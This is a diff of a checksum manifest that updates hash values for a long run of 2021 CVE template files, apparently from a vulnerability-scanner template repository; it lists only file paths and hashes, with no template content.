-http/cves/2021/CVE-2021-25079.yaml:d9e69810b9b97575f0cfd5238d90dd74db3a4b82 -http/cves/2021/CVE-2021-25085.yaml:afc0a0d77bd40c3ae606306bc8ab728490afd270 -http/cves/2021/CVE-2021-25099.yaml:96db4715cf61486a1dbf6bfa99db64b5ee658869 +http/cves/2021/CVE-2021-25075.yaml:39e68482ba95ae484dbef4d943f3eeeef1d76c1e +http/cves/2021/CVE-2021-25078.yaml:6b6bce6eb2304b9669b02daf33b5beb1d08de327 +http/cves/2021/CVE-2021-25079.yaml:c37bcd8632bac20013d43f089a769bdff04eca2e +http/cves/2021/CVE-2021-25085.yaml:a7de237e23ca9d8f5ed0d68dc839956519456fa8 +http/cves/2021/CVE-2021-25099.yaml:c15223269d9bd03eadab6821d3b09267804d0ed4 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 -http/cves/2021/CVE-2021-25111.yaml:4711c0203e3e6926f07508ca55dcc6d338b9eb4a +http/cves/2021/CVE-2021-25111.yaml:6b0f40ebc6836b0910f632f9e4a9610a6f506f3e http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 -http/cves/2021/CVE-2021-25114.yaml:10297fac562f4e9b4758c40509edd8eab28810f1 +http/cves/2021/CVE-2021-25114.yaml:5b5fc3cb6fb7099595c72d0ef22782c7da5cf94b http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 -http/cves/2021/CVE-2021-25120.yaml:180bff131d7b46afe0cbc57424767b9cad725a83 -http/cves/2021/CVE-2021-25281.yaml:bde5a9f73b250b872edc034cbaa883533e6b672d -http/cves/2021/CVE-2021-25296.yaml:eebdd9e01f7de42eac8b0acc73ef7737c22d6dc3 -http/cves/2021/CVE-2021-25297.yaml:798c5dd2384ee37d90e12cc73b40dd17203a5e3a -http/cves/2021/CVE-2021-25298.yaml:a1bd4f65462afa430f096448b5615192e924dc52 -http/cves/2021/CVE-2021-25299.yaml:0bc0073511338a0dc2150935c3b28c868dd2a210 -http/cves/2021/CVE-2021-25646.yaml:702066b84f547c4a34a68f2dc9e154ea75eb1089 -http/cves/2021/CVE-2021-25864.yaml:3eb5887c70ebe0982738c1f4ad76a60d4f2be8c5 -http/cves/2021/CVE-2021-25899.yaml:d3fd60e8943976e7cc7f442b67bae6e189b172ce -http/cves/2021/CVE-2021-26084.yaml:6d75e0a15be35914d87e6629398e42d91e7ea4a3 -http/cves/2021/CVE-2021-26085.yaml:5ca91bf2f3dddfa7d0b0daac72aecd1d601b1f7d -http/cves/2021/CVE-2021-26086.yaml:55727080522c5f3da99faac2205bfd0ea517ee77 -http/cves/2021/CVE-2021-26247.yaml:1f518e180f0a5b4ebde579d3c089c911332fcff0 +http/cves/2021/CVE-2021-25120.yaml:ef1129f3d01121e72cc251f4907dd31121f483f3 +http/cves/2021/CVE-2021-25281.yaml:926d40b41dca38380afe266c4747a494831e1d82 +http/cves/2021/CVE-2021-25296.yaml:747b671ba0e06ff9f7a235ac299f30d4aa099a32 +http/cves/2021/CVE-2021-25297.yaml:52682c3fea52165dc90b59148a0698dce7ec8358 +http/cves/2021/CVE-2021-25298.yaml:0babaec0f4066df9e4caef4eb34b191becf207c8 +http/cves/2021/CVE-2021-25299.yaml:63f77b7b22f20671c58467d9ef2a3826eb2dba51 +http/cves/2021/CVE-2021-25646.yaml:2218d09cd6aee5362f65fb76eee19ff15b8a7b6e +http/cves/2021/CVE-2021-25864.yaml:1ece5f67939fdf5bd24bb6b8b80a4d675100bbf1 +http/cves/2021/CVE-2021-25899.yaml:f84c990490b6e778e06b4abe4673f22c8c954369 +http/cves/2021/CVE-2021-26084.yaml:f13d57a5d654aaabcb6d3548e4ab7e6f4d9c5f4a +http/cves/2021/CVE-2021-26085.yaml:131be1d64bcb55e9a0059917d137c2b2ef5764a8 +http/cves/2021/CVE-2021-26086.yaml:d96d98b05336c9039bdedb473ff20e12255102fa +http/cves/2021/CVE-2021-26247.yaml:daa7279c49fb11ec4e6fcf38895ee3e23cef5d43 http/cves/2021/CVE-2021-26292.yaml:29180065c333be64a12dc3343a26bf290917d6c0 -http/cves/2021/CVE-2021-26294.yaml:e550c9d57e52e8366c6295275e98b23aa79afe3b -http/cves/2021/CVE-2021-26295.yaml:4bf9393f9a6eaa6b1e17ecd3bdc5a21c35ed1c3f +http/cves/2021/CVE-2021-26294.yaml:15b5b6c816a5b0c96e4862d79c168a57e4a41b58 +http/cves/2021/CVE-2021-26295.yaml:760a664616356d218f9d8b23a5e26619132182a9 http/cves/2021/CVE-2021-26475.yaml:287c333e6e6c35e539e84260d37699f19044b24b -http/cves/2021/CVE-2021-26598.yaml:a7a022621420afd7d50b02f94d6f716ed9b48f4c -http/cves/2021/CVE-2021-26702.yaml:73a879a6b590518960d2ab86a8536e1c8caa89b2 -http/cves/2021/CVE-2021-26710.yaml:fa141549f9353b92653492ffb1a5aaf44fe7509b -http/cves/2021/CVE-2021-26723.yaml:8923238ffe8b311a03b85f9b75a2b0002ffa8b27 -http/cves/2021/CVE-2021-26812.yaml:45e106eff3baaf5ac92ab50ec665eb85af894330 -http/cves/2021/CVE-2021-26855.yaml:2b830119668905813c31be417ed819c5c6f29081 -http/cves/2021/CVE-2021-27124.yaml:2a910bac6c0d2944f52f5aad7d3857f778bf1930 +http/cves/2021/CVE-2021-26598.yaml:564c72e7ded58474a970f8bb81499d37bec2eb6f +http/cves/2021/CVE-2021-26702.yaml:38b4c6ea7314d91de56621916deab69db896521f +http/cves/2021/CVE-2021-26710.yaml:62c7e47d0b5631d581a26268dc2fac090da415df +http/cves/2021/CVE-2021-26723.yaml:485872f7cfd865bf4f7974965ab17efaf6fdcf78 +http/cves/2021/CVE-2021-26812.yaml:59f135266598da23e8ccbc78b6800509764ef731 +http/cves/2021/CVE-2021-26855.yaml:eebc2b4f2b4bdce6eb1f3939ba31f790416289b4 +http/cves/2021/CVE-2021-27124.yaml:1629ecb945e3672b3d085110841767983165201f http/cves/2021/CVE-2021-27132.yaml:fcfd3632c51f9fc6add57cb17f22c786e429bc9f -http/cves/2021/CVE-2021-27309.yaml:eda786389e6cde2a47d6e49b8cb435c8a21ed820 +http/cves/2021/CVE-2021-27309.yaml:a3a9b515c775670ff42193b413141bdb9a093baf http/cves/2021/CVE-2021-27310.yaml:6c130175ed546ffc7a70969fe956b16deee4f64d http/cves/2021/CVE-2021-27314.yaml:5a5d404050557c21d88703fe905484af36df4d1c -http/cves/2021/CVE-2021-27315.yaml:face5054c6caa156f4773fee8a2879026b1f72dc +http/cves/2021/CVE-2021-27315.yaml:74654fa6664463c75851f08e5fd40fa498c1e16e http/cves/2021/CVE-2021-27316.yaml:75fe1ce09716aeebd01d4e93523b46c13ac35002 -http/cves/2021/CVE-2021-27319.yaml:19747527a4e69e2db18dd51c4badffb67c3b0710 -http/cves/2021/CVE-2021-27320.yaml:f039210918858c7283d805644a6e6b67e5250e66 -http/cves/2021/CVE-2021-27330.yaml:e1283aff7b6c5f9a8f7c2348081195c2b155657e -http/cves/2021/CVE-2021-27358.yaml:e26586182b33cde07cf9d3315e698ad3305d1231 -http/cves/2021/CVE-2021-27519.yaml:e16b5f5faee4d4125580d4d659bad10f864b643c -http/cves/2021/CVE-2021-27520.yaml:3d1e280d9c78f42dfdd23139370509eb83631355 -http/cves/2021/CVE-2021-27561.yaml:fba16ba46cbc7b1a0830fed4fafe9b7a628f12cc -http/cves/2021/CVE-2021-27651.yaml:b3e18b36b730159a342d259fdd743c5cd3787de3 -http/cves/2021/CVE-2021-27670.yaml:c0bebbeea8ef882d6cf84b4ae5134c54b76823e6 +http/cves/2021/CVE-2021-27319.yaml:4ac703375c9f54452dae10e45521a9e9e275d3bf +http/cves/2021/CVE-2021-27320.yaml:8892536ec8bde5ba1d2a36bafdca53d74a970dc6 +http/cves/2021/CVE-2021-27330.yaml:7c15e8c428cf23f33e9417b848aa1548bb097aba +http/cves/2021/CVE-2021-27358.yaml:8a9b766705b30e318f54311f1ac6ce99298e6c1d +http/cves/2021/CVE-2021-27519.yaml:1e478365ef619cb1325a309573643277445efaec +http/cves/2021/CVE-2021-27520.yaml:460e5969818aa1cf1a07bd3688404dca0ae3ebf0 +http/cves/2021/CVE-2021-27561.yaml:48b8e25de3c4b67ab3c08074a6392f8b79b56d21 +http/cves/2021/CVE-2021-27651.yaml:fb07d45f4dea3a695c3ba1cf1b17282568f3e11d +http/cves/2021/CVE-2021-27670.yaml:ccc4db0cad2f1e302de60259feaf399494056e85 http/cves/2021/CVE-2021-27748.yaml:1dc51db3b3d3be24e2be6387448b7a662531edb5 -http/cves/2021/CVE-2021-27850.yaml:7136a99277bcca5f5c44d9e3816a5ff4f379e16a -http/cves/2021/CVE-2021-27905.yaml:1dc1c48d36bb3d28a84df30cd1199ab100b86918 -http/cves/2021/CVE-2021-27909.yaml:e43bd5d94d972050a9fdafc20a77e3d096488e0e -http/cves/2021/CVE-2021-27931.yaml:1170d3c4da4c2fe8817a4658387df31c991d91c1 +http/cves/2021/CVE-2021-27850.yaml:6d39edaca13ab611f58c51ec72e93ef55b05dfa5 +http/cves/2021/CVE-2021-27905.yaml:d83ca42e2d53248b98aff534b7ba88f52858d1e8 +http/cves/2021/CVE-2021-27909.yaml:788c3fd40aa42d55bb56f89c662a03cb92649b7f +http/cves/2021/CVE-2021-27931.yaml:8dacc9bb81db5a5aeb0dffde8a034619108d38c8 http/cves/2021/CVE-2021-28073.yaml:b69885510093cff31b667b35c1004583ec9fbbf2 http/cves/2021/CVE-2021-28149.yaml:0a69b168f8c598056a57c29b2c4225737cb83bf0 -http/cves/2021/CVE-2021-28150.yaml:a047c5c5dfd214ce39b821b16fbec59af26808a1 +http/cves/2021/CVE-2021-28150.yaml:5c44f0523781a0f4b2d9fb25b5c1e9060126b8df http/cves/2021/CVE-2021-28151.yaml:e126ac73a0c4ae22fe04e5a1374c2fc480bc1367 -http/cves/2021/CVE-2021-28164.yaml:4d1b60d97e4a2b1de4b44577a09bc5e5c44ee3a5 -http/cves/2021/CVE-2021-28169.yaml:761381f1b70418f3563de424d3fba23f25dbc35f -http/cves/2021/CVE-2021-28377.yaml:dad1298461bccf6fadec868718bac767ea649a22 -http/cves/2021/CVE-2021-28419.yaml:46111b613e301cab6f973ee1f83a72b017dfd90f +http/cves/2021/CVE-2021-28164.yaml:c495e9844b37c21638f8ce764c2f65fd67ffd47d +http/cves/2021/CVE-2021-28169.yaml:2a2b83e42d9a0d4016f953c9a03cf66ca77395fd +http/cves/2021/CVE-2021-28377.yaml:a14614a7091a6dae30ad0d7c77c00899100a0981 +http/cves/2021/CVE-2021-28419.yaml:81ea7bd96652f972ce9b5e1cfbd77f7d160ed9c6 http/cves/2021/CVE-2021-28854.yaml:dd2007f9a927a86fa6765c9534a1259eb3c46f86 http/cves/2021/CVE-2021-28918.yaml:20422a3d75001b729c00e4a3c90e9ed033fb4349 -http/cves/2021/CVE-2021-28937.yaml:33b9de2830337ef70cd3bc96a964a2926b5d34af -http/cves/2021/CVE-2021-29006.yaml:48df1946bc4922b68389c03eb991d38872e3e387 -http/cves/2021/CVE-2021-29156.yaml:93a8a327af3566bf396611df96805e19371af7ef -http/cves/2021/CVE-2021-29200.yaml:0298aa937d5f983e48ee7ec9667132c77a005506 -http/cves/2021/CVE-2021-29203.yaml:fdf9afa70263f92a455fc71446859dc5862318e0 +http/cves/2021/CVE-2021-28937.yaml:647e7448f2a3b3555298e351de5a7dba0d958a09 +http/cves/2021/CVE-2021-29006.yaml:3f6d3f064325f17fe590a38bbae392526e5ed5a9 +http/cves/2021/CVE-2021-29156.yaml:5814b1158661cceb1a262e7f34ff5040980e9d73 +http/cves/2021/CVE-2021-29200.yaml:e485da0092f467bdd1adb2cf7dfc544c61ac1f0f +http/cves/2021/CVE-2021-29203.yaml:b4b3c9702a7ba11de6bafd405b269b144634be84 http/cves/2021/CVE-2021-29441.yaml:437a19e0d1b5d31dea8ff40a951b703eb77e4136 -http/cves/2021/CVE-2021-29442.yaml:665b4957617c9f813063e4af7271c9df90fa998c -http/cves/2021/CVE-2021-29484.yaml:f78e59f184d5c43ff7966a2b6fba00554446b9d1 -http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d +http/cves/2021/CVE-2021-29442.yaml:b2fd9c5467a913f80015e20ab5c1ff6fb5ea1950 +http/cves/2021/CVE-2021-29484.yaml:63aa82a7a51ab985cdf379e46d6b1598ec9a0683 +http/cves/2021/CVE-2021-29490.yaml:3a04e9e1ab6011b372335b1e7a7db8adcba0d00c http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 -http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 -http/cves/2021/CVE-2021-29625.yaml:2316f6210b7a01141b776e42c609483a01c95895 -http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 -http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 -http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c -http/cves/2021/CVE-2021-30134.yaml:7528c665e9c5128fe999de9ce7b20a371021ae74 -http/cves/2021/CVE-2021-30151.yaml:0176cff2127ea150798e811cf491ad321fa257ff -http/cves/2021/CVE-2021-3017.yaml:b4d10f41ce02a4b1781629b33ceead5d1ec3f5aa -http/cves/2021/CVE-2021-30175.yaml:f4d14a127f4adb77d1bbd80d4ca4a6efdb76ee7f -http/cves/2021/CVE-2021-3019.yaml:2d7ff341b2391dab52b1df3d9480235402f6ba87 -http/cves/2021/CVE-2021-30213.yaml:f2b8fab0003434dc8448afa8ff44574147ff895e -http/cves/2021/CVE-2021-30461.yaml:ae5caaa70c317e1d678d6bd0e6a4fcb9dacfcdc5 -http/cves/2021/CVE-2021-30497.yaml:97fe78906a2e7131d7a911231a974b78a052e74d -http/cves/2021/CVE-2021-3110.yaml:0c08cd7b5fdcf56a2b157015241027a63921631f -http/cves/2021/CVE-2021-31195.yaml:2e7b035feb9d204db16faf7e5c9c167ba7296aeb +http/cves/2021/CVE-2021-29622.yaml:4075eeaddf6bfc0e38ea03fdb817d651b72bf711 +http/cves/2021/CVE-2021-29625.yaml:f29c485158f863b71003a1d8b54b3564ccdf9baa +http/cves/2021/CVE-2021-3002.yaml:b17285115d6e7ca777078b433959aafc7fc49766 +http/cves/2021/CVE-2021-30049.yaml:10dfed32823f675d7a8200ad9f639d326269d9d9 +http/cves/2021/CVE-2021-30128.yaml:c2064c93ae1cfdae0666a78a041e01f454965dca +http/cves/2021/CVE-2021-30134.yaml:6365aa91075632c43c56867d35f0d5495d0aaa6a +http/cves/2021/CVE-2021-30151.yaml:a5823328a2e51b6e25209da97cfd262cd11028fb +http/cves/2021/CVE-2021-3017.yaml:e6968f807056416f2f6f95ce0b753c7da8f7bdf3 +http/cves/2021/CVE-2021-30175.yaml:3da6712428c20d2f6ed6992dc6c774347f8c6850 +http/cves/2021/CVE-2021-3019.yaml:919abc666f5c4da2d07307d5ad1a6afc76d8403b +http/cves/2021/CVE-2021-30213.yaml:17b564617db8472f9190ed3de84f2385dbcf5ad2 +http/cves/2021/CVE-2021-30461.yaml:24724b1de4aaf6be6836a99107b049804c1017b1 +http/cves/2021/CVE-2021-30497.yaml:558ffe9dd0dc5369a560ffaa5983f5ffc4ae0bbe +http/cves/2021/CVE-2021-3110.yaml:80f9e4876bf76ae9e6916913973ae364fe732628 +http/cves/2021/CVE-2021-31195.yaml:318357499b1e4df75f0af6df36aba00d2f1c9411 http/cves/2021/CVE-2021-31249.yaml:514a2d8097e60e15ab5d5dea64714e8293db2b3a -http/cves/2021/CVE-2021-31250.yaml:510484f661c8a5eb806e034d550dd56f280ab67e +http/cves/2021/CVE-2021-31250.yaml:609cc147261d689c2abfb6f60576bec2d1b390c1 http/cves/2021/CVE-2021-3129.yaml:58cf44f43956214483492f7c4f1664bd05036422 -http/cves/2021/CVE-2021-31537.yaml:a9f1fe45368a3e3827e833c9d11dfc6a44cc0423 -http/cves/2021/CVE-2021-31581.yaml:acf1aa9a035e4f2e7c6cb1096c07ee3ad6faf230 -http/cves/2021/CVE-2021-31589.yaml:79daef52554ca9a96ba3bf701512d0fedccb4bfb -http/cves/2021/CVE-2021-31602.yaml:fc9119f342e5273f86221d47e6b91f0cb514c22d -http/cves/2021/CVE-2021-31682.yaml:7b85f4d5958a0a04bf846b5fcad1f892ce034a0c -http/cves/2021/CVE-2021-31755.yaml:9df221862d345f3d9dc71da5754793a8019cf481 -http/cves/2021/CVE-2021-31805.yaml:729163b1c38d758778be71da7bab030ae84060e3 +http/cves/2021/CVE-2021-31537.yaml:3557e0e6c8c4258523542676e9c54cc4a864d01f +http/cves/2021/CVE-2021-31581.yaml:89e09bf6b0e67ec62e8545a13524c1af524cbad9 +http/cves/2021/CVE-2021-31589.yaml:7f4a33c1d82dbb7a2077ff41bed406c37eb16e2c +http/cves/2021/CVE-2021-31602.yaml:50a07c3242e430b8e02640df76722583bc2129b5 +http/cves/2021/CVE-2021-31682.yaml:80f81046e36750f26a3c45ebf7ed8e1f2ac20061 +http/cves/2021/CVE-2021-31755.yaml:ef66cafb9c455883d62a8674c444e6b657794052 +http/cves/2021/CVE-2021-31805.yaml:ee69e2d4f237e0c6eba34f2eab26551732340203 http/cves/2021/CVE-2021-31856.yaml:02f2f826362c783a35fa70eee7772941eaddcde1 -http/cves/2021/CVE-2021-31862.yaml:4fcfabb3d503bdd5809af389892ca53569217fcc +http/cves/2021/CVE-2021-31862.yaml:688f0289637d1e40b8a70c6fb14d7b4ad60232fb http/cves/2021/CVE-2021-32030.yaml:c0a4636874282c087cf32c8e177c73dd9f771710 http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 -http/cves/2021/CVE-2021-3223.yaml:087280fa99bb84c2ea0ee9e446ede3320cfb4923 +http/cves/2021/CVE-2021-3223.yaml:36219448b19905a79b4884f01b29465c01ef619a http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 -http/cves/2021/CVE-2021-32618.yaml:1282d29e43f0a00e93a6fceebed1750a42af490f +http/cves/2021/CVE-2021-32618.yaml:5c9dccd91eba0c070f7db1399560ccdc8a307650 http/cves/2021/CVE-2021-32682.yaml:31e0b4b5fdcf1ff4fb51b0f653ecfbce0ec0d9d2 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 -http/cves/2021/CVE-2021-32820.yaml:c8e898d2d63b318200ed63044d0be7334a2e6f1b -http/cves/2021/CVE-2021-32853.yaml:a302ac36b360947ff6847b91d294c2eae5e175a8 +http/cves/2021/CVE-2021-32820.yaml:57d867e0ffe0387cf8d39de537bc19f8de4a5ab4 +http/cves/2021/CVE-2021-32853.yaml:21fa7610aab9ab5f27e3e6c9e4546f7f6880d5d4 http/cves/2021/CVE-2021-3293.yaml:36aba5cc9aad3ae4e19921a3f84cdd1db53ae512 -http/cves/2021/CVE-2021-3297.yaml:58eae4a4ae0f9778f784f2a89812d0d7efea6bf7 -http/cves/2021/CVE-2021-33044.yaml:61d12f5ff81a01697bccb13ebc7783c0f0379d5f -http/cves/2021/CVE-2021-33221.yaml:e83450638e3076c8a7c7c62195f70a0e8ef04f7b -http/cves/2021/CVE-2021-33357.yaml:e09a609edcfc1dbbfa81e898edbcf669050bd7f2 +http/cves/2021/CVE-2021-3297.yaml:9d24a96563e4acab938b8f53508908f726e456ce +http/cves/2021/CVE-2021-33044.yaml:25f1d31729eb0d28735576ac71970f91a579f5e6 +http/cves/2021/CVE-2021-33221.yaml:fcf463a7a41b0beb75c543b35f6698c1703754c4 +http/cves/2021/CVE-2021-33357.yaml:cdb2be78509d3d61d0b585b0a4207af47cb45f89 http/cves/2021/CVE-2021-33544.yaml:fce70ffeea8d3bdb07f5f487869da319c7a95fa3 http/cves/2021/CVE-2021-33564.yaml:a82110635a2629a0c81dc6b2984959c690d0c393 -http/cves/2021/CVE-2021-33690.yaml:5fba756e95fdb710254fa52b0f94d01b385a281c -http/cves/2021/CVE-2021-3374.yaml:7e2ba6195d313809875158aef6303cfa35109727 -http/cves/2021/CVE-2021-3377.yaml:c628541a89f6574ac1df5984121133bb6a93c495 +http/cves/2021/CVE-2021-33690.yaml:87e4d72e0fad030fd83158fd1cd59f03ee052899 +http/cves/2021/CVE-2021-3374.yaml:0a10b39966d1393de6d2c5d5ccc8f7556e4dd2e4 +http/cves/2021/CVE-2021-3377.yaml:bd5e20bb66fd84b14fbcd1dbf118056c01fa2c56 http/cves/2021/CVE-2021-3378.yaml:a842331f8c0924d398887c3ec42f8fbac970903c -http/cves/2021/CVE-2021-33807.yaml:8c0c364ad5322aa852db62573b1f85ce906729a9 -http/cves/2021/CVE-2021-33851.yaml:66cc75332c3d13b4ec7982bf3ed6d125541638fa -http/cves/2021/CVE-2021-33904.yaml:53053b47f3a6476fefc5dc83d5e0ab34c74cbcdd +http/cves/2021/CVE-2021-33807.yaml:a61fda186347244feb571f28a9ef0372dda5bcee +http/cves/2021/CVE-2021-33851.yaml:f2cced7480d09d4f3f70ebb9667a5cf0395c40bc +http/cves/2021/CVE-2021-33904.yaml:7c9ab65dea3207c5d4d7ec0f0389e54ddd83041e http/cves/2021/CVE-2021-34370.yaml:a6bb7f8f166cf8c32e0d5413eb96c76d3fb3f6d1 -http/cves/2021/CVE-2021-34429.yaml:4d02f3a8a972903a32cbee4d2244d9d227c113e2 -http/cves/2021/CVE-2021-34473.yaml:dce8423d33c95d7d2ff9700c9b14069d8e7b7545 +http/cves/2021/CVE-2021-34429.yaml:72395ef74692d870bca3d7c36f10597ecf1399fd +http/cves/2021/CVE-2021-34473.yaml:a6fba055485ffd19a582007be3cd8ff1bbff72a8 http/cves/2021/CVE-2021-34621.yaml:56f9dc43ee199038f49466b0b480aa7a964ac31f -http/cves/2021/CVE-2021-34640.yaml:4b798f36995a8a9a0e922d49776f1c2839cb5ea4 -http/cves/2021/CVE-2021-34643.yaml:ead5c8a99d068a7efd4c77e39fe934efcd615bbd -http/cves/2021/CVE-2021-34805.yaml:021029dd251c517a00b5ba3e56ae1eb9f2f32bc0 -http/cves/2021/CVE-2021-35250.yaml:bd5dd5e44187fd1b6444d656e064ee53deb2018d -http/cves/2021/CVE-2021-35265.yaml:cc2ea3d5e1ea9eb0681482ddebf14f2c5d8e1867 +http/cves/2021/CVE-2021-34640.yaml:61caec8b6d0c93bdbe75e426edb560512c56fd42 +http/cves/2021/CVE-2021-34643.yaml:80ca06ba1c1cf0d691768d9f883c9e28fec4edc3 +http/cves/2021/CVE-2021-34805.yaml:225835eb377bfb001f9338527aaa371b464c7a8f +http/cves/2021/CVE-2021-35250.yaml:56665ee2ea1b6d9177011331cead60250b5c3ad2 +http/cves/2021/CVE-2021-35265.yaml:edea4e848e1cea0fc24c3d245a151bda41ddf95f http/cves/2021/CVE-2021-35323.yaml:d147477c5193b9fb927fdf34cf3903193413b232 -http/cves/2021/CVE-2021-35336.yaml:e7ec259d3153a783ccb7555af25139eb90120034 +http/cves/2021/CVE-2021-35336.yaml:6caae867947908ef1442faf0b50f91f399626a27 http/cves/2021/CVE-2021-35380.yaml:166a86250742c082425c822f746a97c97e9db37c -http/cves/2021/CVE-2021-35395.yaml:07c91891742e057d76e9549f0e9400c53061e0b6 -http/cves/2021/CVE-2021-35464.yaml:2cda8ca7381e839590c5b17e483262fde71bf415 -http/cves/2021/CVE-2021-35488.yaml:ad79addd0f52f8c6e3fef3121e04e2bdfcf3dc35 -http/cves/2021/CVE-2021-35587.yaml:e7afa55d4e91320829d4b282717c4f43e9294591 -http/cves/2021/CVE-2021-3577.yaml:704b09c1177c35ce4c5f70fbe04bcdb1950f3d01 -http/cves/2021/CVE-2021-36260.yaml:5c3d7e011562cc9e0ce4444d458c9eb32703afaf -http/cves/2021/CVE-2021-36356.yaml:695cae6079d51b30ad4ce06ebe0aefc2ef6684d2 -http/cves/2021/CVE-2021-36380.yaml:471575f635d42fe0c7d4dc85f0968af7d252ff1c -http/cves/2021/CVE-2021-36450.yaml:0ab298502a0faa1d6021749a8c4c6da0b2008f35 -http/cves/2021/CVE-2021-3654.yaml:fb18f0b2be0c9fdb7cbf3aed22e607001e883f9c -http/cves/2021/CVE-2021-36580.yaml:6e44d44ce13b5319a6e0bb94a75e59f629047f91 -http/cves/2021/CVE-2021-36748.yaml:4f7839fbd2d62b76eb95ad727776d722ed0d245b +http/cves/2021/CVE-2021-35395.yaml:4cc3ed2c5194767f8ca75ce92ba4dab526dc94c9 +http/cves/2021/CVE-2021-35464.yaml:e9e28056833f62649ffb18df6f4b85dbcc14c223 +http/cves/2021/CVE-2021-35488.yaml:dd54cb49aea94f5ef4450cfcbaa82faaa2b134d7 +http/cves/2021/CVE-2021-35587.yaml:d4afb690b5cf0918770a6ddfb4ab4bb2553c6775 +http/cves/2021/CVE-2021-3577.yaml:0a56135b1cbb7f3b10130898fd11a85f526751f4 +http/cves/2021/CVE-2021-36260.yaml:7ba20097cfe679697162daf4e4a38b512d0fba96 +http/cves/2021/CVE-2021-36356.yaml:11649c7f6aefe25455c99ea49cec69e162690899 +http/cves/2021/CVE-2021-36380.yaml:adf247b74181860c6c19fd249c8f064372c4ef46 +http/cves/2021/CVE-2021-36450.yaml:6fcb0b245765fb039a8203789dab679b428176a9 +http/cves/2021/CVE-2021-3654.yaml:a88d24822a0f499bfa14e006237babd366825c4d +http/cves/2021/CVE-2021-36580.yaml:edd21d1beb5fc1b3647b3f3dab0195e72f58b4b6 +http/cves/2021/CVE-2021-36748.yaml:fa9e34fc74625f7e72ea3230becaabb93eac54ff http/cves/2021/CVE-2021-36749.yaml:3b0a7b9a9d14edf603248b938e61d7db03f084a7 http/cves/2021/CVE-2021-36873.yaml:cbff75f79e65e669b04b3b174ef61d586109cc6b http/cves/2021/CVE-2021-37216.yaml:79f6fb2bedd55cef9c44cd8a90e800cbd1714802 -http/cves/2021/CVE-2021-37304.yaml:2bdd5e602dff0a62a2f81dfb8ff276f0e5c22bff -http/cves/2021/CVE-2021-37305.yaml:79497261752eaabaaea2bb3ba4b8588ba6a7eef1 -http/cves/2021/CVE-2021-37416.yaml:a35a69d682ff87c19c213b692a4beae203e7e7d1 +http/cves/2021/CVE-2021-37304.yaml:89e1a775a31a9c61d14b23d0f1bc0b11d8b8a812 +http/cves/2021/CVE-2021-37305.yaml:b1769dd81f876b2322c8ba43750029e933150eec +http/cves/2021/CVE-2021-37416.yaml:5ca48602ee0adc67ab7d08ce6b6afce5cb28e84e http/cves/2021/CVE-2021-37538.yaml:10b588b6c384ac1f6391bcca0f0cf5d2ecf3aca4 -http/cves/2021/CVE-2021-37573.yaml:19b836cb0ce068641c3e7e555d67bec5b39c83f9 -http/cves/2021/CVE-2021-37580.yaml:fa94ec24c6bc2443f6a295b06ebc0df4fd6e601b -http/cves/2021/CVE-2021-37589.yaml:080cb5ba18740b17a79ffce5f43aacf1d63d63bf -http/cves/2021/CVE-2021-37704.yaml:b1ed2950d338c676243d969692819725f2be17b2 -http/cves/2021/CVE-2021-37833.yaml:4e3d9a7c5f7d9b0a34be8a475cc33aa5434c23dc +http/cves/2021/CVE-2021-37573.yaml:5a4623024051f0460741bb0f43cf018eabe7083a +http/cves/2021/CVE-2021-37580.yaml:005d8b2e74cd0be9a1f0c4ce410c98d08a8dc351 +http/cves/2021/CVE-2021-37589.yaml:70ab465b5d1ae2126062e892ffbc91fcd81036a6 +http/cves/2021/CVE-2021-37704.yaml:addffcf9d763ea0a368d137d23172b5c89e16a02 +http/cves/2021/CVE-2021-37833.yaml:6c38bf5800c5fa8bf0ccbd4f8258b8a1258f465f http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 -http/cves/2021/CVE-2021-38540.yaml:35d024ab04458e8db16ff83c1150250efce19039 +http/cves/2021/CVE-2021-38540.yaml:7878fc4ef40a5157a72fea08d7e7d28879cd83e7 http/cves/2021/CVE-2021-38647.yaml:d12fa581ce2c5917cb43d5af2d8edc56a31d3808 -http/cves/2021/CVE-2021-38702.yaml:a76cde1410170a54785ec0c2ed4b0fcbf99437a4 -http/cves/2021/CVE-2021-38704.yaml:a1617b9e257439a847ae7fbaf10b3d9483ccc094 +http/cves/2021/CVE-2021-38702.yaml:937dc8484bbe5c93d0e84e8768a83db1add4c353 +http/cves/2021/CVE-2021-38704.yaml:3862195081ee44163006fc67f25d5cbd56396391 http/cves/2021/CVE-2021-38751.yaml:f73039cf9ee89c0ed2f5823ea7932261ebffa038 http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 http/cves/2021/CVE-2021-39146.yaml:9ef18404257cb1565c85ab67df499d1adaf5152c http/cves/2021/CVE-2021-39152.yaml:27f978b5960d9eb90e9113b832f0ecdf0f1d54ad -http/cves/2021/CVE-2021-39165.yaml:c46e4a77a6436fadd0317c97c30fed720c5b7d09 -http/cves/2021/CVE-2021-39211.yaml:cdf0014833108570ed947011e2fb018800846eff -http/cves/2021/CVE-2021-39226.yaml:3f428cc8e16e0b874f2aed8dc794ca3e5372bce7 +http/cves/2021/CVE-2021-39165.yaml:e6fc6f34e2e87016f6a199dfbcbc1083a9532dae +http/cves/2021/CVE-2021-39211.yaml:8c283388ab4cb374d75f66a73008acfa1ed34107 